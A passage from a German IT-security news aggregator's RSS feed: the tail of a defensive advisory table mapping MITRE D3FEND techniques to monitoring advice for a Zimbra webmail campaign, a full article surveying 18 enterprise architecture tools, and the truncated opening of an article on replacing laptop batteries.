<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[18 Enterprise-Architecture-Tools]]></title>
<description><![CDATA[Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. 
					Foto: I Believe I Can Fly – shutterstock.com




Enterprise Architecture (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftszie...]]></description>
<link>https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " title="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " src="https://images.computerwoche.de/bdb/3284195/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. </p></figcaption></figure><p class="imageCredit">
					Foto: I Believe I Can Fly – shutterstock.com</p></div>




<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2789207/eam-gibt-orientierung-in-der-digitalen-transformation.html" title="Enterprise Architecture" target="_blank">Enterprise Architecture</a> (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftsziele optimal zu unterstützen. Sie sorgen ebenfalls dafür, dass Unternehmen ihre Roadmaps für die <a href="https://www.computerwoche.de/article/2794425/wie-digitale-transformation-richtig-geht.html" title="digitale Transformation" target="_blank">digitale Transformation</a> geordnet vorantreiben können. EA Tools bieten dafür unter anderem Collaboration-, Reporting-, Testing- und Simulationsfunktionen. Mit deren Hilfe lassen sich Modelle implementieren, die Geschäfts- und IT-Prozesse gezielt verbessern.</p>



<p class="wp-block-paragraph">Um die beste Lösung für Ihr Unternehmen zu finden, sollten Sie zuerst prüfen, ob sich das jeweilige Tool mit Ihrem Technologie-Stack integrieren lässt. Anschließend gilt es abzuwägen, ob die Informationen, Diagramme und Tabellen, die die Software zur Verfügung stellt, für das Unternehmen auch einen echten Nutzwert haben.</p>



<h2 class="wp-block-heading">Empfehlenswerte Enterprise-Architecture-Tools</h2>



<p class="wp-block-paragraph">Nachfolgend finden Sie einen Überblick über die wichtigsten Enterprise-Architecture-Tools – in alphabetischer Reihenfolge. Sie stellen einen Mix aus Visualisierungs-, Collaboration- und Project-Management-Funktionen bereit und unterstützen eine Vielzahl von Enterprise Architecture Frameworks.</p>



<p class="wp-block-paragraph"><strong><a href="https://www.ardoq.com/" title="Ardoq" target="_blank" rel="noopener">Ardoq</a></strong></p>



<p class="wp-block-paragraph">Nachdem zuerst über einfache Formulare Informationen von Usern, Entwicklern und sonstigen Stakeholdern im Unternehmen eingesammelt wurden, lässt sich mithilfe von Ardoq ein digitaler Zwilling der gesamten Organisation erstellen. Der Ansatz setzt also darauf, die Menschen, die in ihren Rollen mit den verschiedensten Systemen arbeiten, realistisch in ihrer Arbeitswelt abzubilden.</p>



<p class="wp-block-paragraph">Jede Mitarbeiterin und jeder Mitarbeiter im Unternehmen kann später von den Netzwerkvisualisierungen und Datenfluss-Diagrammen profitieren, um seine eigene Rolle optimal zu unterstützen und den Arbeitsplatz immer wieder anzupassen und zu modernisieren. Das Tool lässt sich mit den wichtigsten Cloud-Plattformen integrieren. Es bietet eine API, die individuelle Anpassungen in allen wichtigen Programmiersprachen (Python, C#, Java, etc.) ermöglicht.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>“Architektonischen Stress” bei Lastspitzen simulieren, falls größere Veränderungen bevorstehen;</p></li>



<li><p>Verstehen, wie verändertes Nutzerverhalten neue Anforderungen generiert;</p></li>



<li><p>Application Portfolio Management, um besser strategisch zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://atollgroup.eu/samu-enterprise-architecture-tool/" title="Atoll Group SAMU" target="_blank" rel="noopener">Atoll Group SAMU</a></strong></p>



<p class="wp-block-paragraph">Das EA-Tool SAMU macht die Enterprise Architecture sichtbar, indem es tiefe Verknüpfungen zwischen On-Premises-Systemen, dem Cloud-Layer und Tools für das Business Process Management aufzeigt. Das Tool der Atoll Group bietet vielfältige Integrationsmöglichkeiten, zum Beispiel mit Monitoring-Tools (etwa Tivoli, ServiceNow), Configuration-Management-Datenbanken (zum Beispiel CA, BMC) oder Service-Organisations-Tools (BMC, HPE). Alle Informationen fließen in ein zentrales Datenmodell ein, das um den zusätzlichen Input der Stakeholder weiter angereichert wird.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Enterprise-Architektur visualisieren;</p></li>



<li><p>strategische Planungsprozesse und Architektur-Reviews mit Informationen unterfüttern;</p></li>



<li><p>mithilfe einer visuellen Verständnisgrundlage die Kommunikation verbessern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.avolutionsoftware.com/enterprise-architecture/" title="Avolution Abacus" target="_blank" rel="noopener">Avolution Abacus</a></strong></p>



<p class="wp-block-paragraph">Dieses Tool erfasst die Breite und den Umfang der Unternehmensarchitektur mit Hilfe eines auf Diagrammen basierenden Dashboards. Die Integration mit gängigen Tools wie SharePoint, <a href="https://www.computerwoche.de/k/excel,3461" target="_blank" class="idgGlossaryLink">Excel</a>, Visio, Google Sheets, Technopedia oder ServiceNow vereinfacht die Nutzung. Abacus wurde inzwischen auch um einen Machine-Learning-Layer ergänzt, der es Anwendern ermöglicht, ein Modell zu trainieren, das ihnen beispielsweise hilft zu erkennen, wer im Unternehmen für welches System verantwortlich ist.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>die IT für das gesamte Unternehmen “öffnen”, um ein allgemeines Verständnis der Datenflüsse zu erzeugen;</p></li>



<li><p>umfassendes Enterprise Modeling, um eine Roadmap für künftige Entwicklungen zu erstellen;</p></li>



<li><p>Business-Metriken tracken, die mit der Unternehmens-Performance zusammenhängen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.boc-group.com/de/adoit/" title="BOC Group ADOIT" target="_blank" rel="noopener">BOC Group ADOIT</a></strong></p>



<p class="wp-block-paragraph">ADOIT soll Teams dabei unterstützen, Ressourcen zu verwalten, Bedarfe vorherzusagen und Assets zu tracken. Dazu mappt das Tool jedes System oder Softwarepaket mit einem Objekt. Die Datenflüsse zwischen den Systemen werden in Beziehungen umgewandelt, die von diesen Objekten mithilfe eines anpassbaren Metamodells erfasst werden. Geschäftsprozesse können auf ähnliche Weise über ein gut integriertes Begleitprodukt namens ADONIS modelliert werden. ADOIT ist Web-basiert und lässt sich auch mit Tools wie Atlassian Confluence integrieren, um die Datenerfassung und -entwicklung zu beschleunigen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein unternehmensweites Modell erstellen, das bei sämtlichen Teammitgliedern ein Verständnis über den Stack schafft – und wie man diesen verbessern kann;</p></li>



<li><p>vollständiger Zugriff auf EA-Daten über eine Mobile-Anwendung;</p></li>



<li><p>bei Fusionen und Übernahmen den Tech-Bereich durch genaues Asset-Mapping orchestrieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Mega Hopex" href="https://www.mega.com/hopex-platform" target="_blank" rel="noopener">Bizzdesign Hopex</a></strong></p>



<p class="wp-block-paragraph">Nach der Übernahme von Mega International zählt die Hopex-Plattform zum Portfolio von Bizzdesign. Sie soll dabei unterstützen, Unternehmensanwendungen zu modellieren und dabei ein Verständnis der von ihnen unterstützten Geschäfts-Workflows schaffen. Dabei liegt ein Schwerpunkt auf den Bereichen Data Governance und Risikomanagement. Hopex basiert auf Microsoft <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2732704/microsoft-azure-mit-der-deutschen-cloud-zu-neuen-geldquellen.html" target="_blank">Azure</a> und stützt sich auf eine Reihe offener Standards wie GraphQL und REST Queries, um Informationen aus Komponentensystemen zu sammeln. Das Reporting ist mit den Office-Tools von Microsoft sowie mit grafischen Lösungen wie Tableau und Qlik integriert.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>datengestützte Erkenntnisse herbeiführen, um Cloud- und Anwendungsbereitstellung zu steuern;</p></li>



<li><p>akkurate Nutzungsmodelle erstellen, um Architekturanforderungen zu verstehen;</p></li>



<li><p>eine Bedarfsschätzung mit Umfragen und anderen Tools vornehmen, um für die Zukunft zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://bizzdesign.com/transformation-suite/horizzon" target="_blank" rel="noreferrer noopener">Bizzdesign Horizzon</a></strong></p>



<p class="wp-block-paragraph">Das Tool dient dazu, Business Workflows und den zugrundeliegenden Tech-Stack zu modellieren. Dazu bietet Horizzon ein Graph-basiertes Modell, das Daten von sämtlichen Stakeholdern einsammelt und diese an eine Analytics-Engine weitergibt. Im Ergebnis entstehen Diagramme, die den aktuellen Systemzustand widerspiegeln. Wichtige Schwerpunkte dieses Tools sind <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2777492/was-sie-ueber-change-management-wissen-muessen.html" target="_blank">Change Management</a> und Zukunftsplanung: Horizzon ist nicht zuletzt dafür konzipiert worden, die Risiken eines Redesigns zu minimieren. Das Toolset unterstützt die wichtigsten Frameworks ArchiMate, TOGAF und BPMN. Neben Mega hat Bizzdesign <a href="https://bizzdesign.com/press-releases/bizzdesign-adds-alfabet-business-following-successful-closing-mega-international" target="_blank" rel="noreferrer noopener">im Januar 2025</a> auch den EA-Geschäftsbereich der Software AG – Alfabet – übernommen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Vorhersage zukünftiger Anforderungen durch Predictive Modeling;</p></li>



<li><p>Orchestrieren von Workflows auf der Basis der technischen und der Business-Architektur;</p></li>



<li><p>Antizipieren von Risiken sowie Security- und Governance-Problemen durch die Modellierung von Datensicherheitsanforderungen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.capstera.com/" target="_blank" rel="noreferrer noopener">Capstera</a></strong></p>



<p class="wp-block-paragraph">Das Tool von Capstera fokussiert darauf, die Business Architecture selbst abzubilden. Value und Process Maps helfen dabei, die Rollen der verschiedenen Unternehmensbereiche zu definieren und nachzuverfolgen. Dabei können im laufenden Prozess Verknüpfungen mit den zugrundeliegenden Softwarprodukten und Tools hinzugefügt werden.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Reports erstellen, die sich erst einmal mit der Business-Architektur selbst beschäftigen;</p></li>



<li><p>Beziehungen zwischen Menschen, Abteilungen und Rollen analysieren;</p></li>



<li><p>die langfristige strategische Planung vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.bee360.com/de/" title="Clausmark Bee360" target="_blank" rel="noopener">Clausmark Bee360</a></strong></p>



<p class="wp-block-paragraph">Teammitglieder, die Clausmarks Flaggschiffprodukt Bee360 (früher Bee4IT) verwenden, wollen eine einfache “Single Source of Truth” über die Workflows im Unternehmen. Ziel ist es, verschiedenen betrieblichen Rollen intelligentere Entscheidungen zu ermöglichen. Das Modul Bee360 FM (Finanzmanagement) bietet etwa die Möglichkeit, Kosten nachzuvollziehen und zuzuordnen. Die Anwender können verschiedene solcher Module miteinander verknüpfen, um EAM, Finanzmanagement, Portfolio Management und Agile Planning nahtlos zu integrieren – bei maximaler Transparenz. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>C-Suite-Ebene befähigen, Projekte zu managen und Assets zuzuweisen;</p></li>



<li><p>präzise digitale Zwillinge entwickeln, um ein Verständnis über Datenflüsse zu schaffen und künftige Erweiterungen zu planen;</p></li>



<li><p>integrierte Wissensdatenbank aufbauen, um alle digitalen Workflows zu tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.enterprise-architecture.com/" title="EAS" target="_blank" rel="noopener">EAS</a></strong></p>



<p class="wp-block-paragraph">Das Essential-Paket von EAS (Enterprise Architecture Solutions) nahm als <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Open-Source</a>-Projekt seinen Anfang und hat sich inzwischen zu einer kommerziell verfügbaren Cloud-Lösung weiterentwickelt. Das Tool erstellt ein Metamodell, das die Interaktionen zwischen Systemen und Geschäftsprozessen beschreibt. Ebenfalls enthalten sind Pakete, um gängige Business Workflows wie Datenmanagement oder DSGVO-Compliance zu tracken.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>den technischen Reifegrad der eigenen Architektur evaluieren;</p></li>



<li><p>Sicherheit und Governance durch besseres Asset Tracking optimieren;</p></li>



<li><p>wachsende Systemkomplexität kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Orbus Software iServer" href="https://www.orbussoftware.com/" target="_blank" rel="noopener">OrbusInfinity</a></strong></p>



<p class="wp-block-paragraph">Orbus Software hat Anfang 2025 die Akquisition seines Konkurrenten Capsifi <a href="https://www.orbussoftware.com/landing-pages/events/webinars/unlocking-the-future-orbus-acquires-capsifi-a-new-era-of-innovation-partnership-apac" target="_blank" rel="noreferrer noopener">abgeschlossen</a>. Der Anbieter stellt mit OrbusInfinity eine Enterprise-Transformation-Plattform auf KI-Basis zur Verfügung,  die schnellere, bessere Entscheidungen, Kosteinesparungen und Risikominimierung verspricht. Architecture-Teams sollen mit Hifle von OrbusInfinity mit einer Vielzahl von Stakeholdern interagieren können, um eine “digitale Blaupause” ihres Unternehmens zu generieren, die eine einheitliche Sicht auf das aktuelle und künftige Geschäft realisieren soll. Diverse Drittanbieter-Tools lassen sich außerdem mit der Plattform <a href="https://www.orbussoftware.com/product/integrations" target="_blank" rel="noreferrer noopener">integrieren</a>, darunter etwa von Microsoft, Flexera, ManageEngine oder ServiceNow. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Stakeholder-Management;</p></li>



<li><p>Enterprise-Landschaften visualisieren;</p></li>



<li><p>Entscheidungsfindung und Datenanalyse automatisieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.planview.com/de/" title="Planview Enterprise One" target="_blank" rel="noopener">Planview Enterprise One</a></strong></p>



<p class="wp-block-paragraph">Planview bietet eine ganze Reihe von Produkten, mit denen Unternehmen Teamwork, Prozesse und die Enterprise Architecture nachvollziehen können. Die Enterprise Tools sind in drei Kategorien unterteilt: strategisches Portfolio-Management, Produktportfolio-Management und Projektportfolio-Management. Im Zusammenspiel entstehen hardware- und Software-übergreifende Layer, die rollenbasierte Perspektiven für Führungskräfte und Teammitglieder eröffnen. Das Toolset integriert mit gängigen Ticket-Tracking-Systemen wie Jira, um Workflow-Analysen und Reports zu erstellen. Inzwischen hat Planview nach einer Übernahme neue Tools in sein Portfolio integriert, die früher unter den Namen Daptiv, Barometer und Projectplace bekannt waren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>eine langfristige, strategische Vision für die Architekturentwicklung aufbauen;</p></li>



<li><p>Entwicklungsarbeit auf Projektebene tracken und in eine beliebige Strategie integrieren;</p></li>



<li><p>mit Fokus auf die Customer Experience und die Produktstruktur den Change vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.qualiware.com/" title="QualiWare Enterprise Architecture" target="_blank" rel="noopener">QualiWare Enterprise Architecture</a></strong></p>



<p class="wp-block-paragraph">Das Enterprise Architecture Tool von QualiWare ist Teil einer größeren Sammlung von Modellierungswerkzeugen, die darauf abzielt, sämtliche Geschäftsprozesse zu erfassen. Beispielsweise ist es möglich, einen digitalen Zwillinge zu bauen, mit dem sich Customer Journeys nachvollziehen lassen. Qualiware hat diverse KI-Algorithmen integriert, um Dokumentation und Process Discovery zu optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein kollaboratives Ökosystem für Business Manager aufbauen, das ein Verständnis von der Enterprise Architecture vermittelt;</p></li>



<li><p>architektonische Designelemente erfassen, um ein Wissens-Ökosystem rund um den Stack aufzubauen;</p></li>



<li><p>eine breite Beteiligung in Sachen Dokumentationserstellung und -überprüfung fördern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.erwin.com/de-de/products/erwin-evolve/" title="Quest Erwin Evolve" target="_blank" rel="noopener">Quest Erwin Evolve</a></strong></p>



<p class="wp-block-paragraph">Das Erwin Evolve Tool von Quest hat sich von einem Datenmodellierungs-Tool zu einem System für Enterprise-Architecture- und Geschäftsprozess-Modellierung weiterentwickelt. Um die Komplexität moderner, ineinandergreifender Softwaresysteme und der von ihnen gemanagten Geschäftsprozesse zu durchdringen, können Anwender auf benutzerdefinierte Datenstrukturen zurückgreifen. Das Web-Tool erstellt Modelle, rollenbasierte Diagramme und andere Visualisierungen, die in allgemein zugängliche Dashboards einfließen. Zum Paket gehört ein KI-basiertes Modellierungs-Tool, das Whiteboard-Skizzen integrieren kann.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>einen digitalen Zwilling für die strategische Modellierung der Enterprise Data Architecture erstellen;</p></li>



<li><p>Customer Journeys verstehen;</p></li>



<li><p>Services und Systeme mit Application Portfolio Management tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="LeanIX Enterprise Architecture Suite" href="https://www.leanix.net/de/produkte/enterprise-architecture-management" target="_blank" rel="noopener">SAP LeanIX Enterprise Architecture Suite</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von LeanIX umfasst unter anderem Enterprise Architecture Management und andere Bereiche, die für Aufgaben wie <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/cloud-computing,3454" target="_blank">SaaS</a>– und Value-Stream-Management wichtig sind – etwa um Cloud-Deployments und darauf laufende Services zu tracken. Die Daten die dabei über die IT-Infrastruktur gesammelt werden, fließen in ein grafisches Dashboard ein. Das Tool ist eng mit wichtigen Cloud-Workflow-Tools wie Confluence, Jira, Signavio und Lucidchart integriert. Das ist für Teams von Vorteil, die diese Tools bereits nutzen, um ihre Entwicklungsstrategien zu planen und umzusetzen. Seit November 2023 <a href="https://www.leanix.net/de/unternehmen/pressemeldungen/leanix-gehoert-jetzt-zu-sap">ist LeanIX Teil von SAP</a>.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Anwendungsmodernisierung und Cloud-Migration managen;</p></li>



<li><p>Obsoleszenz von Software-Services evaluieren;</p></li>



<li><p>Kosten kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.servicenow.com/de/" title="ServiceNow" target="_blank" rel="noopener">ServiceNow</a></strong></p>



<p class="wp-block-paragraph">Die Tool-Sammlung von ServiceNow lässt sich auf verschiedene Architekturtypen herunterbrechen, darunter Assets, <a href="https://www.computerwoche.de/article/2785626/wie-devops-die-it-beschleunigen.html" target="_blank" class="idgGlossaryLink">DevOps</a>, Security und Service. Die Tools katalogisieren die unterschiedlichen Hardware- und Softwareplattformen, um Workflows und Datenflüsse im Unternehmen abzubilden und zu verstehen. Ausführliche Reportings und detaillierte Dashboards ermöglichen Analysen, auf deren Grundlage Risiken minimiert und die Ausfallsicherheit der Systeme erhöht werden können.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Tracken von Assets, Services und Systemen, die das Unternehmen ausmachen;</p></li>



<li><p>Governance-Themen, Risikobegrenzung, IT-Management und Security Operations werden in einer Plattform zusammengeführt;</p></li>



<li><p>durch die Integration von CRM-Tools lassen sich auch kundenorientierte Services managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://sparxsystems.com/products/ea/" title="Sparx Systems" target="_blank" rel="noopener">Sparx Systems</a></strong></p>



<p class="wp-block-paragraph">Um Teams und Projekte verschiedener Größe und Komplexität zu unterstützen, hat Sparx vier Versionen seines EA-Tools entwickelt. Allen gemeinsam ist eine UML-basierte Modellierung, mit der sich die Komponenten komplexer Systeme tracken lassen. Eine Simulations-Engine ermöglicht “War Gaming” und vermittelt ein Verständnis darüber, wie sich Fehler ausbreiten und kaskadieren können. Sparx stellt zudem eine Vielzahl von vorgefertigten Design Patterns bereit, um Teams bei der Modellierung zu unterstützen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Nachfrage- und Lastveränderungen zur Prognose künftiger Anforderungen simulieren;</p></li>



<li><p>(potenzielle) Probleme durch eine Verbindungs-Matrix im Auge behalten;</p></li>



<li><p>Dokumentation erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.teamblue.unicomsi.com/products/system-architect/" title="Unicom System Architect" target="_blank" rel="noopener">Unicom System Architect</a></strong></p>



<p class="wp-block-paragraph">System Architect ist eines der Angebote aus Unicoms Team Blue. Es handelt sich um ein Tool, das ein Metamodell verwendet, um automatisiert so viele Daten wie möglich über die laufenden Systeme zu sammeln – manchmal auch durch ein Reverse Engineering von Datenflüssen. Dieses systemweite Datenmodell kann über benutzerdefinierte Dashboards Teammitgliedern aller Rollen zugänglich gemacht werden. Ein weiteres erwähnenswertes Feature: Die Ressourcenzuweisung lässt sich mit Hilfe von Simulationen optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Was-wäre-wenn-Fragen zum Architekturmodell stellen;</p></li>



<li><p>ein Metamodell von Daten und Systemen aufbauen;</p></li>



<li><p>Migrations- und Transformationspläne erstellen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.valueblue.com/bluedolphin" title="ValueBlue BlueDolphin" target="_blank" rel="noopener">ValueBlue BlueDolphin</a></strong></p>



<p class="wp-block-paragraph">Dieses EA-Tool sammelt Daten auf dreierlei Art:</p>



<ol class="wp-block-list">
<li><p>Es importiert Basisdaten auf der Grundlage standardgesteuerter Automatisierung (ITSM, SAM).</p></li>



<li><p>Es arbeitet mit den Dateiformaten von Architekten und Systemdesignern – etwa ArchiMate oder BPMN.</p></li>



<li><p>Es gibt Fragebögen an andere Stakeholder heraus, die auf anpassbaren Vorlagen basieren.</p></li>
</ol>



<p class="wp-block-paragraph">Die aufbereiteten Informationen werden in einer visuellen Umgebung bereitgestellt, die Auskunft über die historische Entwicklung von Systemen gibt.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>systemweite Daten von internen und externen Stakeholdern automatisiert und formularbasiert erfassen;</p></li>



<li><p>zukunftsorientierte Reportings erzeugen, um den Change zu überwachen und voranzutreiben;</p></li>



<li><p>Kooperation und Zusammenarbeit durch offenes Data Reporting fördern.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.cio.com/article/196069/top-enterprise-architecture-tools.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CIO.com erschienen. </strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Akku im Sinkflug – wann lohnt der Tausch, wann muss ein neues Notebook her?]]></title>
<description><![CDATA[ParinPix / Shutterstock.com



Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der Notebook-Akku nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermei...]]></description>
<link>https://tsecurity.de/de/3694427/it-security-nachrichten/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694427/it-security-nachrichten/akku-im-sinkflug-wann-lohnt-der-tausch-wann-muss-ein-neues-notebook-her/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.16.38.png?w=1024" alt="Akku im Sinkflug" class="wp-image-4198584" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">ParinPix / Shutterstock.com</p></div>



<p class="wp-block-paragraph">Die Steckdose wird zum ständigen Begleiter, das Ladekabel zum wichtigsten Accessoire im Rucksack: Wenn der <a href="https://www.pcwelt.de/article/3158726/akkulaufzeit-unter-windows-11-erhoehen.html" target="_blank">Notebook-Akku</a> nachlässt, wächst unweigerlich der Frust im Alltag. Die schlechte Nachricht: Der chemische Alterungsprozess von Lithium-Ionen-Zellen ist unvermeidbar. Doch ein schwacher Akku bedeutet noch nicht zwingend, dass ein älterer <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank">Laptop</a> in den Elektroschrott gehört. Oft lässt sich der Stromspeicher problemlos austauschen und die Reparatur ist wirtschaftlich sinnvoll. Aber nicht in jedem Fall. Wir zeigen, wie Sie sich an Fakten statt am Bauchgefühl orientieren und wann es Zeit wird, sich nach neuer Hardware umzusehen.</p>



<h2 class="wp-block-heading">Diagnose: Fakten statt Bauchgefühl</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.17.04.png?w=851" alt="Diagnose" class="wp-image-4198585" width="851" height="1024" sizes="auto, (max-width: 851px) 100vw, 851px"></figure><p class="imageCredit">Foundry</p></div>



